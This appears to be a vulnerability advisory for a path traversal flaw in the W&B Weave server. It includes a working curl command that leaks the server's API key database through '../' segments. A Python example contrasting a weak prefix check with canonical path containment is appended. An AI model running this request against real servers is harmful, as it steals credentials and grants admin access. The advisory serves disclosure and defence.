W&B Weave server remote arbitrary file leak and privilege escalation
weave
(,0.50.7]
The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation on the requested path, a request can traverse out of that directory and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.
export WANDB=<WANDB SESSION COOKIE>
export WANDB_SSO=<WANDB SSO SESSION COOKIE>
export SERVER_IP=<WANDB SERVER IP>
curl -s --path-as-is --cookie "wandb=$WANDB; wandb_sso=$WANDB_SSO" "http://$SERVER_IP:8080/__weave/file/vol/weave/cache/../../../vol/mysql/wandb_local/api_keys.ibd" --output apikeys.bin
No mitigations are supplied for this issue.
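The missing validation, shown as an added example that is not Weave's own code: a raw string-prefix check (an assumed pattern, modelled on the shape of the request above) accepts the traversal path, while a check on the canonical path rejects it. The function names and the temporary directory layout are constructed for illustration, and the symlink case goes beyond what the report covers.

```python
import os
import tempfile

def is_allowed_prefix_only(base_dir: str, requested: str) -> bool:
    """Weak check (assumed pattern): compares the raw string prefix only."""
    return requested.startswith(base_dir.rstrip("/") + "/")

def resolve_contained(base_dir: str, requested: str) -> str:
    """Return the canonical path if it stays inside base_dir, else raise."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." segments and follows symlinks before comparing
    target = os.path.realpath(requested)
    if os.path.commonpath([base, target]) != base:
        raise PermissionError(f"path escapes {base}: {requested!r}")
    return target

def blocked(base_dir: str, requested: str) -> bool:
    try:
        resolve_contained(base_dir, requested)
        return False
    except PermissionError:
        return True

def demo() -> dict:
    """Build a constructed directory tree mirroring the paths in the report."""
    with tempfile.TemporaryDirectory() as root:
        cache = os.path.join(root, "vol", "weave", "cache")
        db_dir = os.path.join(root, "vol", "mysql", "wandb_local")
        os.makedirs(cache)
        os.makedirs(db_dir)
        open(os.path.join(db_dir, "api_keys.ibd"), "wb").close()
        ok_file = os.path.join(cache, "artifact.json")  # constructed sample file
        open(ok_file, "wb").close()
        # Same relative shape as the request path in the report
        traversal = cache + "/../../../vol/mysql/wandb_local/api_keys.ibd"
        # A link inside the cache that points outside it
        os.symlink(db_dir, os.path.join(cache, "link"))
        via_link = os.path.join(cache, "link", "api_keys.ibd")
        return {
            "prefix_accepts_traversal": is_allowed_prefix_only(cache, traversal),
            "prefix_accepts_symlink": is_allowed_prefix_only(cache, via_link),
            "contained_blocks_traversal": blocked(cache, traversal),
            "contained_blocks_symlink": blocked(cache, via_link),
            "contained_allows_cache_file": not blocked(cache, ok_file),
        }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```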